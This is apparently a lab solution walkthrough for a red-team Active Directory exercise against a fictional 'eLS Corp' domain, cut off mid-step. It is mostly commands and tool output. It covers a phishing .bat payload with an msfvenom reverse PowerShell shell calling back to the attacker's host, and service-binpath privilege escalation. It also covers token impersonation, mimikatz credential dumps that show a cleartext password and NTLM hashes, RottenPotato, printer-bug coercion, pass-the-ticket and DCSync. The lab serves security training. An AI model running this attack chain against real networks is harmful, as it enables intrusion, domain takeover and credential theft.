Red-teaming Active Directory Lab #3 (ELS.

CORP)
(Attack Path 1)

1
Contents
1 Mail Server Attack Path (Path 1) 2

1.1 DEV SYS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

1.2 DB-SRV . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
1.3 ELS-DC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
1.4 MGMT-DC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
1.5 JUMP-SRV . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
1.6 Admin-SYS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23

Scenario
You have been asked to execute a (black-box) red teaming exercise against eLS Corp (including any
related/trusted forest). The letter of engagement has specified:

1. The ADMIN-SYS system as the crown jewel. This means that the ultimate goal of this red teaming
exercise is to obtain access to the ADMIN-SYS system.
2. That during this exercise, the web application hosted on 172.16.250.2 is out of scope and should not
be touched
3. The mail server hosted on 172.16.250.2 is included in the scope and you can execute phishing
attempts. Note that the only file type you can attach is .bat files.
4. That the pentesters’ network range is 172.16.25.0/24 and a static route has been configured so that
pentesters can access the 172.16.250.0/24 network range, where eLS Corp assets exist
5. For any cracking activities use the /usr/share/wordlists/rockyou.txt wordlist, included in latest Kali’s

Hints
Refer to the attack path diagram of page 1 only when you are out of options.

2
1 DEV-SYS Server

Scanning the accessible IP range from the scope of engagement provides us with two possible entry
points both residing on the “172.16.250.2” IP. Specifically, scanning the TCP ports of 172.16.250.2 tells us
that an SMTP server and a web application are running on TCP ports 25 and 80. According to the letter of
engagement, the web application is out of scope.

Let’s perform banner grabbing against the SMTP service running on the target server. A username “dev-
user@els.corp” is visible which means the mailbox belongs to this particular user.

3
Since there is no other entry point, we need to send a malicious attachment along with an e-mail to “dev-
user” and wait until the attachment is opened.

We will use msfvenom to generate a malicious batch file, that will be sent as an attachment to the victim
machine.

𝑚𝑠𝑓𝑣𝑒𝑛𝑜𝑚 − 𝑝 𝑐𝑚𝑑/𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑟𝑒𝑣𝑒𝑟𝑠𝑒_𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙 𝐿𝐻𝑂𝑆𝑇 = 172.16.25. 𝑥 𝐿𝑃𝑂𝑅𝑇 = 4443 > 𝑎𝑡𝑡𝑎𝑐ℎ. 𝑏𝑎𝑡

Let’s now setup our listener using Metasploit, using the above TCP port and IP address.

𝑚𝑠𝑓𝑐𝑜𝑛𝑠𝑜𝑙𝑒
𝑢𝑠𝑒 𝑒𝑥𝑝𝑙𝑜𝑖𝑡/𝑚𝑢𝑙𝑡𝑖/ℎ𝑎𝑛𝑑𝑙𝑒𝑟
𝑠𝑒𝑡 𝑝𝑎𝑦𝑙𝑜𝑎𝑑 𝑐𝑚𝑑/𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑟𝑒𝑣𝑒𝑟𝑠𝑒_𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙
𝑠𝑒𝑡 𝐿𝐻𝑂𝑆𝑇 < 𝑦𝑜𝑢𝑟_𝐼𝑃_𝐴𝑑𝑑𝑟𝑒𝑠𝑠 >
𝑠𝑒𝑡 𝐿𝑃𝑂𝑅𝑇 < 𝐿𝑖𝑠𝑡𝑒𝑛𝑖𝑛𝑔_𝑃𝑜𝑟𝑡 >
𝑟𝑢𝑛

For sending the e-mail to our target [“dev-user.els.corp”] we will use the “sendmail” tool, as follows.

𝑐𝑎𝑡 𝑚𝑠𝑔. 𝑡𝑥𝑡 | 𝑠𝑒𝑛𝑑𝑒𝑚𝑎𝑖𝑙 − 𝑙 𝑒𝑚𝑎𝑖𝑙. 𝑙𝑜𝑔 − 𝑓 "𝑠𝑒𝑛𝑑𝑒𝑟@𝑡𝑒𝑠𝑡. 𝑐𝑜𝑚" − 𝑢 "𝑠𝑢𝑏𝑗𝑒𝑐𝑡" − 𝑡 "𝑑𝑒𝑣
− 𝑢𝑠𝑒𝑟@𝑒𝑙𝑠. 𝑐𝑜𝑟𝑝"
−𝑠 "172.16.250.2: 25" − 𝑜 𝑡𝑙𝑠 = 𝑛𝑜 − 𝑎 𝑎𝑡𝑡𝑎𝑐ℎ𝑚𝑒𝑛𝑡. 𝑏𝑎𝑡

Switches:

-f: Sender of mail

-u: Subject added in the mail

-t: Target user (or recipient)

-s: Server to connect while sending mail

-a: Attachment to send with Mail.

The e-mail should have been sent successfully, when the following message appears:

4
 As soon as our attachment is opened by the target user [“dev-user.els.corp”], we will have our initial
foothold in the target user machine.

This session can then be converted into a stable meterpreter session, as follows:

𝑢𝑠𝑒 𝑝𝑜𝑠𝑡/𝑚𝑢𝑙𝑡𝑖/𝑚𝑎𝑛𝑎𝑔𝑒/𝑠ℎ𝑒𝑙𝑙_𝑡𝑜_𝑚𝑒𝑡𝑒𝑟𝑝𝑟𝑒𝑡𝑒𝑟
𝑠𝑒𝑡 𝑝𝑎𝑦𝑙𝑜𝑎𝑑_𝑜𝑣𝑒𝑟𝑟𝑖𝑑𝑒 𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑚𝑒𝑡𝑒𝑟𝑝𝑟𝑒𝑡𝑒𝑟/𝑟𝑒𝑣𝑒𝑟𝑠𝑒_𝑡𝑐𝑝
𝑠𝑒𝑡 𝑠𝑒𝑠𝑠𝑖𝑜𝑛 < 𝑠𝑒𝑠𝑠𝑖𝑜𝑛_𝐼𝐷 >
𝑠𝑒𝑡 𝐿𝐻𝑂𝑆𝑇 172.16.25. 𝑥
𝑠𝑒𝑡 𝐿𝑃𝑂𝑅𝑇 < 𝑙𝑖𝑠𝑡𝑒𝑛𝑖𝑛𝑔_𝑝𝑜𝑟𝑡 >
run

or

𝑠𝑒𝑠𝑠𝑖𝑜𝑛𝑠 − 𝑢 < 𝑠𝑒𝑠𝑠𝑖𝑜𝑛_𝐼𝐷 >

We now have a stable Meterpreter session with “dev-user“ domain user rights. We now need to
enumerate the environment & elevate our privileges in order to move forward in the network.

After enumerating the services, we as “dev-user” have FULL CONTROL over the SNMPTRAP service.

𝐶:\𝑊𝑖𝑛𝑑𝑜𝑤𝑠\𝑠𝑦𝑠𝑡𝑒𝑚32 > 𝒔𝒄 𝒒𝒄 𝒔𝒏𝒎𝒑𝒕𝒓𝒂𝒑

𝑠𝑐 𝑞𝑐 𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝
[𝑆𝐶] 𝑄𝑢𝑒𝑟𝑦𝑆𝑒𝑟𝑣𝑖𝑐𝑒𝐶𝑜𝑛𝑓𝑖𝑔 𝑆𝑈𝐶𝐶𝐸𝑆𝑆

𝑆𝐸𝑅𝑉𝐼𝐶𝐸_𝑁𝐴𝑀𝐸: 𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝
𝑇𝑌𝑃𝐸 ∶ 10 𝑊𝐼𝑁32_𝑂𝑊𝑁_𝑃𝑅𝑂𝐶𝐸𝑆𝑆
𝑆𝑇𝐴𝑅𝑇_𝑇𝑌𝑃𝐸 ∶ 2 𝐴𝑈𝑇𝑂_𝑆𝑇𝐴𝑅𝑇
𝐸𝑅𝑅𝑂𝑅_𝐶𝑂𝑁𝑇𝑅𝑂𝐿 ∶ 1 𝑁𝑂𝑅𝑀𝐴𝐿
𝐵𝐼𝑁𝐴𝑅𝑌_𝑃𝐴𝑇𝐻_𝑁𝐴𝑀𝐸 ∶ 𝐶:\𝑊𝑖𝑛𝑑𝑜𝑤𝑠\𝑆𝑦𝑠𝑡𝑒𝑚32\𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝. 𝑒𝑥𝑒
𝐿𝑂𝐴𝐷_𝑂𝑅𝐷𝐸𝑅_𝐺𝑅𝑂𝑈𝑃 ∶
𝑇𝐴𝐺 ∶ 0
𝐷𝐼𝑆𝑃𝐿𝐴𝑌_𝑁𝐴𝑀𝐸 ∶ 𝑆𝑁𝑀𝑃 𝑇𝑟𝑎𝑝
𝐷𝐸𝑃𝐸𝑁𝐷𝐸𝑁𝐶𝐼𝐸𝑆 ∶
𝑆𝐸𝑅𝑉𝐼𝐶𝐸_𝑆𝑇𝐴𝑅𝑇_𝑁𝐴𝑀𝐸 ∶ .\𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟

5
Since we have full control over this service, to elevate our privileges to local administrator we can
add dev-user to the “Administrators” group by abusing the binary path of the service.

𝑠𝑐 𝑠𝑡𝑜𝑝 𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝
𝑠𝑐 𝑐𝑜𝑛𝑓𝑖𝑔 𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝 𝑏𝑖𝑛𝑝𝑎𝑡ℎ = "𝑛𝑒𝑡 𝑙𝑜𝑐𝑎𝑙𝑔𝑟𝑜𝑢𝑝 𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟𝑠 𝑑𝑒𝑣 − 𝑢𝑠𝑒𝑟 /𝑎𝑑𝑑"
𝑠𝑐 𝑠𝑡𝑎𝑟𝑡 𝑠𝑛𝑚𝑝𝑡𝑟𝑎𝑝

Exit the shell and spawn a new shell from the meterpreter prompt. We can see that “Dev-User” can
now be found as a member of the local Administrators group.

𝐶:\𝑊𝑖𝑛𝑑𝑜𝑤𝑠\𝑠𝑦𝑠𝑡𝑒𝑚32 > 𝒏𝒆𝒕 𝒍𝒐𝒄𝒂𝒍𝒈𝒓𝒐𝒖𝒑 𝑨𝒅𝒎𝒊𝒏𝒊𝒔𝒕𝒓𝒂𝒕𝒐𝒓𝒔

𝑛𝑒𝑡 𝑙𝑜𝑐𝑎𝑙𝑔𝑟𝑜𝑢𝑝 𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟𝑠
𝐴𝑙𝑖𝑎𝑠 𝑛𝑎𝑚𝑒 𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟𝑠
𝐶𝑜𝑚𝑚𝑒𝑛𝑡 𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟𝑠 ℎ𝑎𝑣𝑒 𝑐𝑜𝑚𝑝𝑙𝑒𝑡𝑒 𝑎𝑛𝑑 𝑢𝑛𝑟𝑒𝑠𝑡𝑟𝑖𝑐𝑡𝑒𝑑 𝑎𝑐𝑐𝑒𝑠𝑠 𝑡𝑜 𝑡ℎ𝑒 𝑐𝑜𝑚𝑝𝑢𝑡𝑒𝑟/𝑑𝑜𝑚𝑎𝑖𝑛

𝑀𝑒𝑚𝑏𝑒𝑟𝑠

−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟
𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷\𝑑𝑒𝑣 − 𝑢𝑠𝑒𝑟
𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷\𝐷𝑜𝑚𝑎𝑖𝑛 𝐴𝑑𝑚𝑖𝑛𝑠

𝑇ℎ𝑒 𝑐𝑜𝑚𝑚𝑎𝑛𝑑 𝑐𝑜𝑚𝑝𝑙𝑒𝑡𝑒𝑑 𝑠𝑢𝑐𝑐𝑒𝑠𝑠𝑓𝑢𝑙𝑙𝑦

A Database Connection configuration file is located at the Administrator’s Desktop, but as a local
administrator member we still do not have enough privileges to view it.

To view the file, we can impersonate the token of Administrator at DEV-SYS, as follows.

𝑙𝑜𝑎𝑑 𝑖𝑛𝑐𝑜𝑔𝑛𝑖𝑡𝑜

𝑙𝑖𝑠𝑡_𝑡𝑜𝑘𝑒𝑛𝑠 − 𝑢

<Result>
𝐷𝑒𝑙𝑒𝑔𝑎𝑡𝑖𝑜𝑛 𝑇𝑜𝑘𝑒𝑛𝑠 𝐴𝑣𝑎𝑖𝑙𝑎𝑏𝑙𝑒
====================
𝐷𝐸𝑉 − 𝑆𝑌𝑆\𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟
𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷\𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛
𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷\𝑑𝑒𝑣 − 𝑢𝑠𝑒𝑟
[..SNIP..]
</Result>

𝑖𝑚𝑝𝑒𝑟𝑠𝑜𝑛𝑎𝑡𝑒_𝑡𝑜𝑘𝑒𝑛 "𝐷𝐸𝑉 − 𝑆𝑌𝑆\\𝐴𝑑𝑚𝑖𝑛𝑖𝑠𝑡𝑟𝑎𝑡𝑜𝑟"

𝑔𝑒𝑡𝑢𝑖𝑑

Now, as DEV-SYS\Administrator we can view the file located at the Administrator’s Desktop. An IP
address of a Database server is clearly visible in the file.

6
As part of our post-exploitation activities, we will dump the credentials in this machine to maintain
stable persistence.

But first, let us migrate to x64 process & load the kiwi module to dump credentials.

𝑚𝑖𝑔𝑟𝑎𝑡𝑒 $𝑥64_𝑝𝑖𝑑

𝑙𝑜𝑎𝑑 𝑘𝑖𝑤𝑖

𝑘𝑖𝑤𝑖_𝑐𝑚𝑑 ‘𝑠𝑒𝑘𝑢𝑟𝑙𝑠𝑎: : 𝑙𝑜𝑔𝑜𝑛𝑝𝑎𝑠𝑠𝑤𝑜𝑟𝑑𝑠’

[. . 𝑆𝑁𝐼𝑃. . ]

𝑚𝑠𝑣 ∶
[00000003] 𝑃𝑟𝑖𝑚𝑎𝑟𝑦
∗ 𝑈𝑠𝑒𝑟𝑛𝑎𝑚𝑒 ∶ 𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛
∗ 𝐷𝑜𝑚𝑎𝑖𝑛 ∶ 𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷
∗ 𝑁𝑇𝐿𝑀 ∶ 𝟕𝒃𝟓𝟑𝒄𝟔𝟎𝒆𝟗𝟏𝟏𝟑𝒄𝒄𝟖𝒃𝟏𝟗𝟒𝒄𝒃𝟑𝟒𝒅𝒆𝟒𝟖𝟎𝟓𝒇𝟑𝒃
∗ 𝑆𝐻𝐴1 ∶ 72𝑓𝑑2𝑐3𝑑682𝑑3957𝑓𝑑6𝑏8523𝑑𝑑86𝑐𝑐12𝑏𝑎51𝑎𝑒𝑓2
∗ 𝐷𝑃𝐴𝑃𝐼 ∶ 𝑓5𝑐𝑓𝑑88𝑑690𝑒1𝑒9338𝑒2𝑒𝑑8162𝑎6𝑏6𝑏4
𝑡𝑠𝑝𝑘𝑔 ∶
𝑤𝑑𝑖𝑔𝑒𝑠𝑡 ∶
∗ 𝑈𝑠𝑒𝑟𝑛𝑎𝑚𝑒 ∶ 𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛
∗ 𝐷𝑜𝑚𝑎𝑖𝑛 ∶ 𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷
∗ 𝑃𝑎𝑠𝑠𝑤𝑜𝑟𝑑 ∶ 𝑯@𝒓𝒅𝑷@𝒔𝒔𝑫! 𝒇𝒇! 𝒄𝒖𝒍𝒕𝟗𝟔𝟒!!
𝑘𝑒𝑟𝑏𝑒𝑟𝑜𝑠 ∶
∗ 𝑈𝑠𝑒𝑟𝑛𝑎𝑚𝑒 ∶ 𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛
∗ 𝐷𝑜𝑚𝑎𝑖𝑛 ∶ 𝐸𝐿𝑆 − 𝐶𝐻𝐼𝐿𝐷. 𝐸𝐿𝑆. 𝐶𝑂𝑅𝑃
∗ 𝑃𝑎𝑠𝑠𝑤𝑜𝑟𝑑 ∶ (𝑛𝑢𝑙𝑙)
𝑠𝑠𝑝 ∶
𝑐𝑟𝑒𝑑𝑚𝑎𝑛 ∶

[. . 𝑆𝑁𝐼𝑃. . ]

‘Dev-Admin’ (domain user) credentials have been discovered. Now, let’s add a route to 10.10.1.0/24
network discovered in the configuration file.

𝑟𝑜𝑢𝑡𝑒 𝑎𝑑𝑑 10.10.1.0/24 < 𝑠𝑒𝑠𝑠𝑖𝑜𝑛_𝐼𝐷 >

7
2 DB-SRV Server

By performing ping sweep on the machines in the 10.10.1.0/24 network, the following hosts were
found live.

𝑢𝑠𝑒 𝑝𝑜𝑠𝑡/𝑚𝑢𝑙𝑡𝑖/𝑔𝑎𝑡ℎ𝑒𝑟/𝑝𝑖𝑛𝑔_𝑠𝑤𝑒𝑒𝑝

𝑠𝑒𝑡 𝑟ℎ𝑜𝑠𝑡𝑠 10.10.1.0/24

𝑠𝑒𝑡 𝑠𝑒𝑠𝑠𝑖𝑜𝑛 < 𝑠𝑒𝑠𝑠𝑖𝑜𝑛_𝐼𝐷 >

𝑟𝑢𝑛

[..SNIP..]

[+] 10.10.1.1 host found

[+] 10.10.1.2 host found

[+] 10.10.1.3 host found

[..SNIP..]

Scanning for open TCP ports on the 10.10.1.2 machine that we discovered, shows that TCP port 1433
is actually open.

The discovered “dev-admin” credentials can be sprayed on the target network. Metasploit’s
“scanner/mssql/mssql_login” can also be used to check if a SQL instance is running at the specified
machine with credentials.

The following text box shows how to use “dev-admin” credentials with the abovementioned
Metasploit module to check whether we have access to any MS SQL instances on the machines we
discovered on the internal network.

𝑢𝑠𝑒 𝑠𝑐𝑎𝑛𝑛𝑒𝑟/𝑚𝑠𝑠𝑞𝑙/𝑚𝑠𝑠𝑞𝑙_𝑙𝑜𝑔𝑖𝑛

𝑠𝑒𝑡 𝑢𝑠𝑒𝑟𝑛𝑎𝑚𝑒 𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛

𝑠𝑒𝑡 𝑝𝑎𝑠𝑠𝑤𝑜𝑟𝑑 𝐻@𝑟𝑑𝑃@𝑠𝑠𝐷! 𝑓𝑓! 𝑐𝑢𝑙𝑡964!!

𝑠𝑒𝑡 𝑟ℎ𝑜𝑠𝑡𝑠 10.10.1.1 − 3

8
It seems that dev-admin can login to the DB-SRV [10.10.1.2] machine.

Trying to enable “xp_cmdshell” to maintain a persistent shell on the DB-SRV machine has failed
because the user has insufficient rights to do so.

After enumeration, it was found that there is a SQL impersonation vulnerability on the DB-SRV
machine through which the “dev-admin” user can impersonate the “sa” user.

𝑢𝑠𝑒 𝑎𝑑𝑚𝑖𝑛/𝑚𝑠𝑠𝑞𝑙/𝑚𝑠𝑠𝑞𝑙_𝑒𝑠𝑐𝑎𝑙𝑎𝑡𝑒_𝑒𝑥𝑒𝑐𝑢𝑡𝑒_𝑎𝑠

𝑠𝑒𝑡 𝑈𝑆𝐸𝑅𝑁𝐴𝑀𝐸 𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛

𝑠𝑒𝑡 𝑃𝐴𝑆𝑆𝑊𝑂𝑅𝐷 𝐻@𝑟𝑑𝑃@𝑠𝑠𝐷! 𝑓𝑓! 𝑐𝑢𝑙𝑡964!!

𝑠𝑒𝑡 𝑅𝐻𝑂𝑆𝑇𝑆 10.10.1.2

𝑟𝑢𝑛

“dev-admin” now has system admin rights.

9
 With sufficient privileges, we can now enable “xp_cmdshell” to establish a stable bind shell on DB-
SRV server.

𝑢𝑠𝑒 𝑒𝑥𝑝𝑙𝑜𝑖𝑡/𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑚𝑠𝑠𝑞𝑙/𝑚𝑠𝑠𝑞𝑙_𝑝𝑎𝑦𝑙𝑜𝑎𝑑

𝑠𝑒𝑡 𝑈𝑆𝐸𝑅𝑁𝐴𝑀𝐸 𝑑𝑒𝑣 − 𝑎𝑑𝑚𝑖𝑛

𝑠𝑒𝑡 𝑃𝐴𝑆𝑆𝑊𝑂𝑅𝐷 𝐻@𝑟𝑑𝑃@𝑠𝑠𝐷! 𝑓𝑓! 𝑐𝑢𝑙𝑡964!!

𝑠𝑒𝑡 𝑅𝐻𝑂𝑆𝑇𝑆 10.10.1.2

𝑠𝑒𝑡 𝑝𝑎𝑦𝑙𝑜𝑎𝑑 𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑚𝑒𝑡𝑒𝑟𝑝𝑟𝑒𝑡𝑒𝑟/𝑏𝑖𝑛𝑑_𝑡𝑐𝑝

set LHOST 172.16.25.x

run

𝑟𝑢𝑛

Meterpreter will enable the SQL function and upload a malicious VBS script to DB-SRV.

We are currently running as the SQL service account. We need to escalate privileges in DB-SRV.

Listing the privileges of the SQL service shows that we have “SeImpersonatePrivilege” and
“SeAssignPrimaryTokenPrivilege”, we can use the infamous rottenpotato exploit to escalate our
privileges to ‘NT AUTHORITY\SYSTEM’.

10
 On the meterpreter prompt, do the following to escalate to “NT Authority\System”:

On meterpreter shell:
𝑢𝑝𝑙𝑜𝑎𝑑 𝑟𝑜𝑡𝑡𝑒𝑛_𝑝𝑜𝑡𝑎𝑡𝑜. 𝑒𝑥𝑒 𝐶:\\𝑈𝑠𝑒𝑟𝑠\\𝑃𝑢𝑏𝑙𝑖𝑐\\𝑟𝑜𝑡𝑡𝑒𝑛. 𝑒𝑥𝑒
𝑐𝑑 𝐶:\\𝑈𝑠𝑒𝑟𝑠\\𝑃𝑢𝑏𝑙𝑖𝑐\\𝑟𝑜𝑡𝑡𝑒𝑛. 𝑒𝑥𝑒

Execute rottenpotato from meterpreter:

𝑒𝑥𝑒𝑐𝑢𝑡𝑒 − 𝑐𝑀 − 𝑓 ./𝑟𝑜𝑡𝑡𝑒𝑛. 𝑒𝑥𝑒
𝐶𝑇𝑅𝐿 + 𝑍 (𝑏𝑎𝑐𝑘𝑔𝑟𝑜𝑢𝑛𝑑 𝑠𝑒𝑠𝑠𝑖𝑜𝑛)

On meterpreter shell:
𝑙𝑜𝑎𝑑 𝑖𝑛𝑐𝑜𝑔𝑛𝑖𝑡𝑜
𝑙𝑖𝑠𝑡_𝑡𝑜𝑘𝑒𝑛𝑠 − 𝑢
𝑖𝑚𝑝𝑒𝑟𝑠𝑜𝑛𝑎𝑡𝑒_𝑡𝑜𝑘𝑒𝑛 "𝑁𝑇 𝐴𝑈𝑇𝐻𝑂𝑅𝐼𝑇𝑌\\𝑆𝑌𝑆𝑇𝐸𝑀"
𝑔𝑒𝑡𝑢𝑖𝑑
𝑠ℎ𝑒𝑙𝑙

Successfully escalated to System privileges…

Now, we will check if any type of delegation is enabled in this server, one can always use the AD
Module or PowerView for confirmation. Let’s use the AD Module to check for delegation.

On the meterpreter shell upload the AD Module DLL file

𝑼𝒑𝒍𝒐𝒂𝒅 𝑀𝑖𝑐𝑟𝑜𝑠𝑜𝑓𝑡. 𝐴𝑐𝑡𝑖𝑣𝑒𝐷𝑖𝑟𝑒𝑐𝑡𝑜𝑟𝑦. 𝑀𝑎𝑛𝑎𝑔𝑒𝑚𝑒𝑛𝑡. 𝑑𝑙𝑙 𝐶:\\𝑈𝑠𝑒𝑟𝑠\\𝑃𝑢𝑏𝑙𝑖𝑐\\ 𝑀𝑖𝑐𝑟𝑜𝑠𝑜𝑓𝑡. 𝐴𝑐𝑡𝑖𝑣𝑒𝐷𝑖𝑟𝑒𝑐𝑡𝑜𝑟𝑦. 𝑀𝑎𝑛𝑎𝑔𝑒𝑚𝑒𝑛𝑡. 𝑑𝑙𝑙

On a shell (Switch to PowerShell)

𝐼𝑚𝑝𝑜𝑟𝑡 − 𝑀𝑜𝑑𝑢𝑙𝑒 𝑀𝑖𝑐𝑟𝑜𝑠𝑜𝑓𝑡. 𝐴𝑐𝑡𝑖𝑣𝑒𝐷𝑖𝑟𝑒𝑐𝑡𝑜𝑟𝑦. 𝑀𝑎𝑛𝑎𝑔𝑒𝑚𝑒𝑛𝑡. 𝑑𝑙𝑙 − 𝑣𝑒𝑟𝑏𝑜𝑠𝑒

𝐺𝑒𝑡 − 𝐴𝐷𝐶𝑜𝑚𝑝𝑢𝑡𝑒𝑟 − 𝐹𝑖𝑙𝑡𝑒𝑟 {𝑇𝑟𝑢𝑠𝑡𝑒𝑑𝐹𝑜𝑟𝐷𝑒𝑙𝑒𝑔𝑎𝑡𝑖𝑜𝑛 − 𝑒𝑞 $𝑇𝑟𝑢𝑒}

DB-SRV is configured with Unconstrained Delegation! Now, let us leverage this and try to force a
privileged account to connect to the DB-SRV server.

11
With enough privileges, we will now abuse the famous printer bug to get a TGT from the els.corp
Domain Controller. Upload “Rubeus.exe” and “MS-RPRN.exe” to the DB-SRV server and on one shell
run Rubeus, while on another one coerce “els-dc” to connect to capture the TGT hash, as follows.

On meterpreter shell

𝑢𝑝𝑙𝑜𝑎𝑑 𝑅𝑢𝑏𝑒𝑢𝑠. 𝑒𝑥𝑒 𝐶:\\𝑈𝑠𝑒𝑟𝑠\\𝑃𝑢𝑏𝑙𝑖𝑐\\𝑅𝑢𝑏𝑒𝑢𝑠. 𝑒𝑥𝑒

𝑢𝑝𝑙𝑜𝑎𝑑 𝑀𝑆 − 𝑅𝑃𝑅𝑁. 𝑒𝑥𝑒 𝐶:\\𝑈𝑠𝑒𝑟𝑠\\𝑃𝑢𝑏𝑙𝑖𝑐\\ 𝑀𝑆 − 𝑅𝑃𝑅𝑁. 𝑒𝑥𝑒
𝑠ℎ𝑒𝑙𝑙 (𝑖. 𝑒 1)
𝑅𝑢𝑏𝑒𝑢𝑠. 𝑒𝑥𝑒 𝑚𝑜𝑛𝑖𝑡𝑜𝑟 𝑖𝑛𝑡𝑒𝑟𝑣𝑎𝑙: 5
𝐶𝑇𝑅𝐿 + 𝑧 (𝑏𝑎𝑐𝑘𝑔𝑟𝑜𝑢𝑛𝑑 𝑡ℎ𝑒 𝑠𝑒𝑠𝑠𝑖𝑜𝑛)

𝑠ℎ𝑒𝑙𝑙 (𝑖. 𝑒 2)
𝑀𝑆 − 𝑅𝑃𝑅𝑁. 𝑒𝑥𝑒 \\𝑒𝑙𝑠 − 𝑑𝑐. 𝑒𝑙𝑠. 𝑐𝑜𝑟𝑝 \\𝑑𝑏 − 𝑠𝑟𝑣. 𝑒𝑙𝑠. 𝑐𝑜𝑟𝑝
𝐶𝑇𝑅𝐿 + 𝑧 (𝑏𝑎𝑐𝑘𝑔𝑟𝑜𝑢𝑛𝑑 𝑡ℎ𝑒 𝑠𝑒𝑠𝑠𝑖𝑜𝑛)

On Meterpreter shell switch to channel 1

𝑐ℎ𝑎𝑛𝑛𝑒𝑙 − 𝑖 1
(𝑇𝐺𝑇 ℎ𝑎𝑠ℎ 𝑜𝑓 𝑒𝑙𝑠 − 𝑑𝑐$ 𝑖𝑠 𝑐𝑎𝑝𝑡𝑢𝑟𝑒𝑑)

If the following message appears while executing MS-RPRN.exe, then the forceful connection from
“els-dc” might have worked.

‘Attempted printer notification and received an invalid handle. The coerced authentication probably worked!’

12
Since the extracted TGT hash is base64-encoded we need to remove the extra spaces and perform a
pass the ticket attack against the ‘els-dc’ domain controller.

On the powershell prompt

$𝑡𝑔𝑡 = ‘𝑏𝑎𝑠𝑒64_𝑒𝑛𝑐𝑜𝑑𝑒𝑑_ℎ𝑎𝑠ℎ’

$𝑡𝑔𝑡 − 𝑟𝑒𝑝𝑙𝑎𝑐𝑒("`𝑛 ", "") − 𝑟𝑒𝑝𝑙𝑎𝑐𝑒 ("`𝑟", "")

NOTE: There is 6 spaces in the 2nd command, else remove spaces

manually using notepad etc.

Perform PTT using “Rubeus.exe”:

𝑅𝑢𝑏𝑒𝑢𝑠. 𝑒𝑥𝑒 𝑝𝑡𝑡 /𝑡𝑖𝑐𝑘𝑒𝑡: < 𝑏64_𝑒𝑛𝑐_𝑡𝑘𝑡 >

[*] Action: Import Ticket

[+] Ticket successfully imported!

The active Kerberos ticket can be viewed as follows:

13
Now, with a “ELS-DC$” ticket active in the current session, we will use Mimikatz to perform a
DCSYNC attack against the “els.corp” domain.

In meterpreter session

𝑢𝑝𝑙𝑜𝑎𝑑 𝑚𝑖𝑚𝑖𝑘𝑎𝑡𝑧. 𝑒𝑥𝑒 𝐶:\\𝑈𝑠𝑒𝑟𝑠\\𝑃𝑢𝑏𝑙𝑖𝑐\\𝑚𝑖𝑚𝑖𝑘𝑎𝑡𝑧. 𝑒𝑥𝑒

𝑠ℎ𝑒𝑙𝑙

In Command Channel

𝐶:\𝑈𝑠𝑒𝑟𝑠\𝑃𝑢𝑏𝑙𝑖𝑐\𝑚𝑖𝑚𝑖𝑘𝑎𝑡𝑧. 𝑒𝑥𝑒

𝑝𝑟𝑖𝑣𝑖𝑙𝑒𝑔𝑒: : 𝑑𝑒𝑏𝑢𝑔

𝑙𝑠𝑎𝑑𝑢𝑚𝑝: : 𝑑𝑐𝑠𝑦𝑛𝑐 /𝑢𝑠𝑒𝑟: 𝑒𝑙𝑠\𝑘𝑟𝑏𝑡𝑔𝑡

<Result> NTLM:a8a94897fbb33ed8925f17ba7ccdff67 </Result>

𝑙𝑠𝑎𝑑𝑢𝑚𝑝: : 𝑑𝑐𝑠𝑦𝑛𝑐 /𝑢𝑠𝑒𝑟: 𝑒𝑙𝑠\𝑒𝑙𝑠 − 𝑎𝑑𝑚𝑖𝑛

<Result> NTLM: 8645e87e2593507cf623f3291b1334c2 </Result>

We are able to perform a DCSYNC attack because the Domain Controller computer account by-
default has “Get-Replication-Changes” & “Get-Replication-Changes-All” rights over domain object.

14
3 ELS-DC Server

With access to “els-admin” domain admin at ELS-DC server, we can maintain a stable persistent
shell.

Use Metasploit’s windows/smb/psexec module to establish a connection with the target machine.

In meterpreter session

𝑠𝑒𝑡 𝑅𝐻𝑂𝑆𝑇𝑆 10.10.1.3

